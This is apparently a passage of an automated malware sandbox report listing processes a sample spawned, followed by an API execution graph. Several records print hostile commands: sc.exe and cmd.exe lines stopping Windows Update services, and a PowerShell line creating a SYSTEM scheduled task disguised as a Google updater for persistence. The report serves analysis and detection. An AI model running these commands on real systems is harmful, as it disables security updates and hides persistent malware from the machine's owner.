                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:44
                                  Start time:17:15:37
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:45
                                  Start time:17:15:37
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc stop UsoSvc
                                  Imagebase:0x7ff6ae8f0000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:46
                                  Start time:17:15:37
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc stop WaaSMedicSvc
                                  Imagebase:0x7ff6ae8f0000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:47
                                  Start time:17:15:37
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc stop wuauserv
                                  Imagebase:0x7ff6ae8f0000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:48
                                  Start time:17:15:37
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc stop bits
                                  Imagebase:0x7ff6ae8f0000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:49
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Imagebase:0x7ff7ca360000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:50
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:51
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc stop dosvc
                                  Imagebase:0x7ff6ae8f0000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:52
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc stop UsoSvc
                                  Imagebase:0x7ff6ae8f0000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:53
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc stop WaaSMedicSvc
                                  Imagebase:0x7ff6ae8f0000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:54
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\dialer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\dialer.exe
                                  Imagebase:0x7ff75e270000
                                  File size:39'936 bytes
                                  MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:55
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:56
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:57
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc stop wuauserv
                                  Imagebase:0x7ff6ae8f0000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:58
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\winlogon.exe
                                  Wow64 process (32bit):false
                                  Commandline:winlogon.exe
                                  Imagebase:0x7ff7cd660000
                                  File size:906'240 bytes
                                  MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:59
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc stop bits
                                  Imagebase:0x7ff6ae8f0000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:60
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc stop dosvc
                                  Imagebase:0x7ff6ae8f0000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:61
                                  Start time:17:15:38
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\dialer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\dialer.exe
                                  Imagebase:0x7ff75e270000
                                  File size:39'936 bytes
                                  MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:62
                                  Start time:17:15:39
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:63
                                  Start time:17:15:39
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:13.3%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:20.6%
                                    Total number of Nodes:1523
                                    Total number of Limit Nodes:39
                                    execution_graph 4187 402fc0 4188 401446 18 API calls 4187->4188 4189 402fc7 4188->4189 4190 403017 4189->4190 4191 40300a 4189->4191 4194 401a13 4189->4194 4192 406805 18 API calls 4190->4192 4193 401446 18 API calls 4191->4193 4192->4194 4193->4194 4195 4023c1 4196 40145c 18 API calls 4195->4196 4197 4023c8 4196->4197 4200 40726a 4197->4200 4203 406ed2 CreateFileW 4200->4203 4204 406f04 4203->4204 4205 406f1e ReadFile 4203->4205 4206 4062a3 11 API calls 4204->4206 4207 4023d6 4205->4207 4210 406f84 4205->4210 4206->4207 4208 4071e3 CloseHandle 4208->4207 4209 406f9b ReadFile lstrcpynA lstrcmpA 4209->4210 4211 406fe2 SetFilePointer ReadFile 4209->4211 4210->4207 4210->4208 4210->4209 4214 406fdd 4210->4214 4211->4208 4212 4070a8 ReadFile 4211->4212 4213 407138 4212->4213 4213->4212 4213->4214 4215 40715f SetFilePointer GlobalAlloc ReadFile 4213->4215 4214->4208 4216 4071a3 4215->4216 4217 4071bf lstrcpynW GlobalFree 4215->4217 4216->4216 4216->4217 4217->4208 4218 401cc3 4219 40145c 18 API calls 4218->4219 4220 401cca lstrlenW 4219->4220 4221 4030dc 4220->4221 4222 4030e3 4221->4222 4224 405f51 wsprintfW 4221->4224 4224->4222 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062a3 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406c9b 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4250 403050 4247->4250 4248 406805 18 API calls 4249 401a13 4248->4249 4250->4248 4250->4249 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4048cc 4261 4048f1 4260->4261 4262 4048da 4260->4262 4264 4048ff IsWindowVisible 4261->4264 4268 404916 4261->4268 4263 4048e0 4262->4263 4278 40495a 4262->4278 4265 403daf SendMessageW 4263->4265 4267 40490c 4264->4267 4264->4278 4269 4048ea 4265->4269 4266 404960 CallWindowProcW 4266->4269 4279 40484e SendMessageW 4267->4279 4268->4266 4284 406009 lstrcpynW 4268->4284 4272 404945 4285 405f51 wsprintfW 4272->4285 4274 40494c 4275 40141d 80 API calls 4274->4275 4276 404953 4275->4276 4286 406009 lstrcpynW 4276->4286 4278->4266 4280 404871 GetMessagePos ScreenToClient SendMessageW 4279->4280 4281 4048ab SendMessageW 4279->4281 4282 4048a3 4280->4282 4283 4048a8 4280->4283 4281->4282 4282->4268 4283->4281 4284->4272 4285->4274 4286->4278 4287 4022cc 4288 40145c 18 API calls 4287->4288 4289 4022d3 4288->4289 4290 4062d5 2 API calls 4289->4290 4291 4022d9 4290->4291 4292 4022e8 4291->4292 4296 405f51 wsprintfW 4291->4296 4295 4030e3 4292->4295 4297 405f51 wsprintfW 4292->4297 4296->4292 4297->4295 4298 4050cd 4299 405295 4298->4299 4300 4050ee GetDlgItem GetDlgItem GetDlgItem 4298->4300 4301 4052c6 4299->4301 4302 40529e GetDlgItem CreateThread CloseHandle 4299->4302 4347 403d98 SendMessageW 4300->4347 4304 4052f4 4301->4304 4306 4052e0 ShowWindow ShowWindow 4301->4306 4307 405316 4301->4307 4302->4301 4308 405352 4304->4308 4310 405305 4304->4310 4311 40532b ShowWindow 4304->4311 4305 405162 4318 406805 18 API calls 4305->4318 4352 403d98 SendMessageW 4306->4352 4356 403dca 4307->4356 4308->4307 4313 40535d SendMessageW 4308->4313 4353 403d18 4310->4353 4316 40534b 4311->4316 4317 40533d 4311->4317 4315 40528e 4313->4315 4320 405376 CreatePopupMenu 4313->4320 4319 403d18 SendMessageW 4316->4319 4321 404f72 25 API calls 4317->4321 4322 405181 4318->4322 4319->4308 4323 406805 18 API calls 4320->4323 4321->4316 4324 4062a3 11 API calls 4322->4324 4326 405386 AppendMenuW 4323->4326 4325 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4324->4325 4327 4051f3 4325->4327 4328 4051d7 SendMessageW SendMessageW 4325->4328 4329 405399 GetWindowRect 4326->4329 4330 4053ac 4326->4330 4331 405206 4327->4331 4332 4051f8 SendMessageW 4327->4332 4328->4327 4333 4053b3 TrackPopupMenu 4329->4333 4330->4333 4348 403d3f 4331->4348 4332->4331 4333->4315 4335 4053d1 4333->4335 4337 4053ed SendMessageW 4335->4337 4336 405216 4338 405253 GetDlgItem SendMessageW 4336->4338 4339 40521f ShowWindow 4336->4339 4337->4337 4340 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4337->4340 4338->4315 4343 405276 SendMessageW SendMessageW 4338->4343 4341 405242 4339->4341 4342 405235 ShowWindow 4339->4342 4344 40542f SendMessageW 4340->4344 4351 403d98 SendMessageW 4341->4351 4342->4341 4343->4315 4344->4344 4345 40545a GlobalUnlock SetClipboardData CloseClipboard 4344->4345 4345->4315 4347->4305 4349 406805 18 API calls 4348->4349 4350 403d4a SetDlgItemTextW 4349->4350 4350->4336 4351->4338 4352->4304 4354 403d25 SendMessageW 4353->4354 4355 403d1f 4353->4355 4354->4307 4355->4354 4357 403ddf GetWindowLongW 4356->4357 4367 403e68 4356->4367 4358 403df0 4357->4358 4357->4367 4359 403e02 4358->4359 4360 403dff GetSysColor 4358->4360 4361 403e12 SetBkMode 4359->4361 4362 403e08 SetTextColor 4359->4362 4360->4359 4363 403e30 4361->4363 4364 403e2a GetSysColor 4361->4364 4362->4361 4365 403e41 4363->4365 4366 403e37 SetBkColor 4363->4366 4364->4363 4365->4367 4368 403e54 DeleteObject 4365->4368 4369 403e5b CreateBrushIndirect 4365->4369 4366->4365 4367->4315 4368->4369 4369->4367 4370 4030cf 4371 40145c 18 API calls 4370->4371 4372 4030d6 4371->4372 4374 4030dc 4372->4374 4377 4063ac GlobalAlloc lstrlenW 4372->4377 4375 4030e3 4374->4375 4404 405f51 wsprintfW 4374->4404 4378 4063e2 4377->4378 4379 406434 4377->4379 4380 40640f GetVersionExW 4378->4380 4405 40602b CharUpperW 4378->4405 4379->4374 4380->4379 4381 40643e 4380->4381 4382 406464 LoadLibraryA 4381->4382 4383 40644d 4381->4383 4382->4379 4386 406482 GetProcAddress GetProcAddress GetProcAddress 4382->4386 4383->4379 4385 406585 GlobalFree 4383->4385 4387 40659b LoadLibraryA 4385->4387 4388 4066dd FreeLibrary 4385->4388 4391 4064aa 4386->4391 4394 4065f5 4386->4394 4387->4379 4390 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4387->4390 4388->4379 4389 406651 FreeLibrary 4398 40662a 4389->4398 4390->4394 4392 4064ce FreeLibrary GlobalFree 4391->4392 4391->4394 4400 4064ea 4391->4400 4392->4379 4393 4066ea 4396 4066ef CloseHandle FreeLibrary 4393->4396 4394->4389 4394->4398 4395 4064fc lstrcpyW OpenProcess 4397 40654f CloseHandle CharUpperW lstrcmpW 4395->4397 4395->4400 4399 406704 CloseHandle 4396->4399 4397->4394 4397->4400 4398->4393 4401 406685 lstrcmpW 4398->4401 4402 4066b6 CloseHandle 4398->4402 4403 4066d4 CloseHandle 4398->4403 4399->4396 4400->4385 4400->4395 4400->4397 4401->4398 4401->4399 4402->4398 4403->4388 4404->4375 4405->4378 4406 407752 4410 407344 4406->4410 4407 407c6d 4408 4073c2 GlobalFree 4409 4073cb GlobalAlloc 4408->4409 4409->4407 4409->4410 4410->4407 4410->4408 4410->4409 4410->4410 4411 407443 GlobalAlloc 4410->4411 4412 40743a GlobalFree 4410->4412 4411->4407 4411->4410 4412->4411 4413 401dd3 4414 401446 18 API calls 4413->4414 4415 401dda 4414->4415 4416 401446 18 API calls 4415->4416 4417 4018d3 4416->4417 4425 402e55 4426 40145c 18 API calls 4425->4426 4427 402e63 4426->4427 4428 402e79 4427->4428 4429 40145c 18 API calls 4427->4429 4430 405e30 2 API calls 4428->4430 4429->4428 4431 402e7f 4430->4431 4455 405e50 GetFileAttributesW CreateFileW 4431->4455 4433 402e8c 4434 402f35 4433->4434 4435 402e98 GlobalAlloc 4433->4435 4438 4062a3 11 API calls 4434->4438 4436 402eb1 4435->4436 4437 402f2c CloseHandle 4435->4437 4456 403368 SetFilePointer 4436->4456 4437->4434 4440 402f45 4438->4440 4442 402f50 DeleteFileW 4440->4442 4443 402f63 4440->4443 4441 402eb7 4445 403336 ReadFile 4441->4445 4442->4443 4457 401435 4443->4457 4446 402ec0 GlobalAlloc 4445->4446 4447 402ed0 4446->4447 4448 402f04 WriteFile GlobalFree 4446->4448 4449 40337f 37 API calls 4447->4449 4450 40337f 37 API calls 4448->4450 4454 402edd 4449->4454 4451 402f29 4450->4451 4451->4437 4453 402efb GlobalFree 4453->4448 4454->4453 4455->4433 4456->4441 4458 404f72 25 API calls 4457->4458 4459 401443 4458->4459 4460 401cd5 4461 401446 18 API calls 4460->4461 4462 401cdd 4461->4462 4463 401446 18 API calls 4462->4463 4464 401ce8 4463->4464 4465 40145c 18 API calls 4464->4465 4466 401cf1 4465->4466 4467 401d07 lstrlenW 4466->4467 4468 401d43 4466->4468 4469 401d11 4467->4469 4469->4468 4473 406009 lstrcpynW 4469->4473 4471 401d2c 4471->4468 4472 401d39 lstrlenW 4471->4472 4472->4468 4473->4471 4474 403cd6 4475 403ce1 4474->4475 4476 403ce5 4475->4476 4477 403ce8 GlobalAlloc 4475->4477 4477->4476 4478 402cd7 4479 401446 18 API calls 4478->4479 4482 402c64 4479->4482 4480 402d99 4481 402d17 ReadFile 4481->4482 4482->4478 4482->4480 4482->4481 4483 402dd8 4484 402ddf 4483->4484 4485 4030e3 4483->4485 4486 402de5 FindClose 4484->4486 4486->4485 4487 401d5c 4488 40145c 18 API calls 4487->4488 4489 401d63 4488->4489 4490 40145c 18 API calls 4489->4490 4491 401d6c 4490->4491 4492 401d73 lstrcmpiW 4491->4492 4493 401d86 lstrcmpW 4491->4493 4494 401d79 4492->4494 4493->4494 4495 401c99 4493->4495 4494->4493 4494->4495 4125 407c5f 4126 407344 4125->4126 4127 4073c2 GlobalFree 4126->4127 4128 4073cb GlobalAlloc 4126->4128 4129 407c6d 4126->4129 4130 407443 GlobalAlloc 4126->4130 4131 40743a GlobalFree 4126->4131 4127->4128 4128->4126 4128->4129 4130->4126 4130->4129 4131->4130 4496 404363 4497 404373 4496->4497 4498 40439c 4496->4498 4500 403d3f 19 API calls 4497->4500 4499 403dca 8 API calls 4498->4499 4501 4043a8 4499->4501 4502 404380 SetDlgItemTextW 4500->4502 4502->4498 4503 4027e3 4504 4027e9 4503->4504 4505 4027f2 4504->4505 4506 402836 4504->4506 4519 401553 4505->4519 4507 40145c 18 API calls 4506->4507 4509 40283d 4507->4509 4511 4062a3 11 API calls 4509->4511 4510 4027f9 4512 40145c 18 API calls 4510->4512 4517 401a13 4510->4517 4513 40284d 4511->4513 4514 40280a RegDeleteValueW 4512->4514 4523 40149d RegOpenKeyExW 4513->4523 4515 4062a3 11 API calls 4514->4515 4518 40282a RegCloseKey 4515->4518 4518->4517 4520 401563 4519->4520 4521 40145c 18 API calls 4520->4521 4522 401589 RegOpenKeyExW 4521->4522 4522->4510 4529 401515 4523->4529 4531 4014c9 4523->4531 4524 4014ef RegEnumKeyW 4525 401501 RegCloseKey 4524->4525 4524->4531 4526 4062fc 3 API calls 4525->4526 4528 401511 4526->4528 4527 401526 RegCloseKey 4527->4529 4528->4529 4532 401541 RegDeleteKeyW 4528->4532 4529->4517 4530 40149d 3 API calls 4530->4531 4531->4524 4531->4525 4531->4527 4531->4530 4532->4529 4533 403f64 4534 403f90 4533->4534 4535 403f74 4533->4535 4537 403fc3 4534->4537 4538 403f96 SHGetPathFromIDListW 4534->4538 4544 405c84 GetDlgItemTextW 4535->4544 4540 403fad SendMessageW 4538->4540 4541 403fa6 4538->4541 4539 403f81 SendMessageW 4539->4534 4540->4537 4542 40141d 80 API calls 4541->4542 4542->4540 4544->4539 4545 402ae4 4546 402aeb 4545->4546 4547 4030e3 4545->4547 4548 402af2 CloseHandle 4546->4548 4548->4547 4549 402065 4550 401446 18 API calls 4549->4550 4551 40206d 4550->4551 4552 401446 18 API calls 4551->4552 4553 402076 GetDlgItem 4552->4553 4554 4030dc 4553->4554 4555 4030e3 4554->4555 4557 405f51 wsprintfW 4554->4557 4557->4555 4558 402665 4559 40145c 18 API calls 4558->4559 4560 40266b 4559->4560 4561 40145c 18 API calls 4560->4561 4562 402674 4561->4562 4563 40145c 18 API calls 4562->4563 4564 40267d 4563->4564 4565 4062a3 11 API calls 4564->4565 4566 40268c 4565->4566 4567 4062d5 2 API calls 4566->4567 4568 402695 4567->4568 4569 4026a6 lstrlenW lstrlenW 4568->4569 4570 404f72 25 API calls 4568->4570 4573 4030e3 4568->4573 4571 404f72 25 API calls 4569->4571 4570->4568 4572 4026e8 SHFileOperationW 4571->4572 4572->4568 4572->4573 4581 401c69 4582 40145c 18 API calls 4581->4582 4583 401c70 4582->4583 4584 4062a3 11 API calls 4583->4584 4585 401c80 4584->4585 4586 405ca0 MessageBoxIndirectW 4585->4586 4587 401a13 4586->4587 4595 402f6e 4596 402f72 4595->4596 4597 402fae 4595->4597 4598 4062a3 11 API calls 4596->4598 4599 40145c 18 API calls 4597->4599 4600 402f7d 4598->4600 4605 402f9d 4599->4605 4601 4062a3 11 API calls 4600->4601 4602 402f90 4601->4602 4603 402fa2 4602->4603 4604 402f98 4602->4604 4607 4060e7 9 API calls 4603->4607 4606 403e74 5 API calls 4604->4606 4606->4605 4607->4605 4608 4023f0 4609 402403 4608->4609 4610 4024da 4608->4610 4611 40145c 18 API calls 4609->4611 4612 404f72 25 API calls 4610->4612 4613 40240a 4611->4613 4618 4024f1 4612->4618 4614 40145c 18 API calls 4613->4614 4615 402413 4614->4615 4616 402429 LoadLibraryExW 4615->4616 4617 40241b GetModuleHandleW 4615->4617 4619 40243e 4616->4619 4620 4024ce 4616->4620 4617->4616 4617->4619 4632 406365 GlobalAlloc WideCharToMultiByte 4619->4632 4621 404f72 25 API calls 4620->4621 4621->4610 4623 402449 4624 40248c 4623->4624 4625 40244f 4623->4625 4626 404f72 25 API calls 4624->4626 4628 401435 25 API calls 4625->4628 4630 40245f 4625->4630 4627 402496 4626->4627 4629 4062a3 11 API calls 4627->4629 4628->4630 4629->4630 4630->4618 4631 4024c0 FreeLibrary 4630->4631 4631->4618 4633 406390 GetProcAddress 4632->4633 4634 40639d GlobalFree 4632->4634 4633->4634 4634->4623 4635 402df3 4636 402dfa 4635->4636 4638 4019ec 4635->4638 4637 402e07 FindNextFileW 4636->4637 4637->4638 4639 402e16 4637->4639 4641 406009 lstrcpynW 4639->4641 4641->4638 4642 402175 4643 401446 18 API calls 4642->4643 4644 40217c 4643->4644 4645 401446 18 API calls 4644->4645 4646 402186 4645->4646 4647 4062a3 11 API calls 4646->4647 4651 402197 4646->4651 4647->4651 4648 4021aa EnableWindow 4650 4030e3 4648->4650 4649 40219f ShowWindow 4649->4650 4651->4648 4651->4649 4659 404077 4660 404081 4659->4660 4661 404084 lstrcpynW lstrlenW 4659->4661 4660->4661 4662 405479 4663 405491 4662->4663 4664 4055cd 4662->4664 4663->4664 4665 40549d 4663->4665 4666 40561e 4664->4666 4667 4055de GetDlgItem GetDlgItem 4664->4667 4668 4054a8 SetWindowPos 4665->4668 4669 4054bb 4665->4669 4671 405678 4666->4671 4679 40139d 80 API calls 4666->4679 4670 403d3f 19 API calls 4667->4670 4668->4669 4673 4054c0 ShowWindow 4669->4673 4674 4054d8 4669->4674 4675 405608 SetClassLongW 4670->4675 4672 403daf SendMessageW 4671->4672 4692 4055c8 4671->4692 4701 40568a 4672->4701 4673->4674 4676 4054e0 DestroyWindow 4674->4676 4677 4054fa 4674->4677 4678 40141d 80 API calls 4675->4678 4729 4058dc 4676->4729 4680 405510 4677->4680 4681 4054ff SetWindowLongW 4677->4681 4678->4666 4682 405650 4679->4682 4685 405587 4680->4685 4686 40551c GetDlgItem 4680->4686 4681->4692 4682->4671 4687 405654 SendMessageW 4682->4687 4683 40141d 80 API calls 4683->4701 4684 4058de DestroyWindow EndDialog 4684->4729 4688 403dca 8 API calls 4685->4688 4690 40554c 4686->4690 4691 40552f SendMessageW IsWindowEnabled 4686->4691 4687->4692 4688->4692 4689 40590d ShowWindow 4689->4692 4694 405559 4690->4694 4695 4055a0 SendMessageW 4690->4695 4696 40556c 4690->4696 4704 405551 4690->4704 4691->4690 4691->4692 4693 406805 18 API calls 4693->4701 4694->4695 4694->4704 4695->4685 4699 405574 4696->4699 4700 405589 4696->4700 4697 403d18 SendMessageW 4697->4685 4698 403d3f 19 API calls 4698->4701 4702 40141d 80 API calls 4699->4702 4703 40141d 80 API calls 4700->4703 4701->4683 4701->4684 4701->4692 4701->4693 4701->4698 4705 403d3f 19 API calls 4701->4705 4720 40581e DestroyWindow 4701->4720 4702->4704 4703->4704 4704->4685 4704->4697 4706 405705 GetDlgItem 4705->4706 4707 405723 ShowWindow EnableWindow 4706->4707 4708 40571a 4706->4708 4730 403d85 EnableWindow 4707->4730 4708->4707 4710 40574d EnableWindow 4713 405761 4710->4713 4711 405766 GetSystemMenu EnableMenuItem SendMessageW 4712 405796 SendMessageW 4711->4712 4711->4713 4712->4713 4713->4711 4731 403d98 SendMessageW 4713->4731 4732 406009 lstrcpynW 4713->4732 4716 4057c4 lstrlenW 4717 406805 18 API calls 4716->4717 4718 4057da SetWindowTextW 4717->4718 4719 40139d 80 API calls 4718->4719 4719->4701 4721 405838 CreateDialogParamW 4720->4721 4720->4729 4722 40586b 4721->4722 4721->4729 4723 403d3f 19 API calls 4722->4723 4724 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4723->4724 4725 40139d 80 API calls 4724->4725 4726 4058bc 4725->4726 4726->4692 4727 4058c4 ShowWindow 4726->4727 4728 403daf SendMessageW 4727->4728 4728->4729 4729->4689 4729->4692 4730->4710 4731->4713 4732->4716 4733 4020f9 GetDC GetDeviceCaps 4734 401446 18 API calls 4733->4734 4735 402116 MulDiv 4734->4735 4736 401446 18 API calls 4735->4736 4737 40212c 4736->4737 4738 406805 18 API calls 4737->4738 4739 402165 CreateFontIndirectW 4738->4739 4740 4030dc 4739->4740 4741 4030e3 4740->4741 4743 405f51 wsprintfW 4740->4743 4743->4741 4744 4024fb 4745 40145c 18 API calls 4744->4745 4746 402502 4745->4746 4747 40145c 18 API calls 4746->4747 4748 40250c 4747->4748 4749 40145c 18 API calls 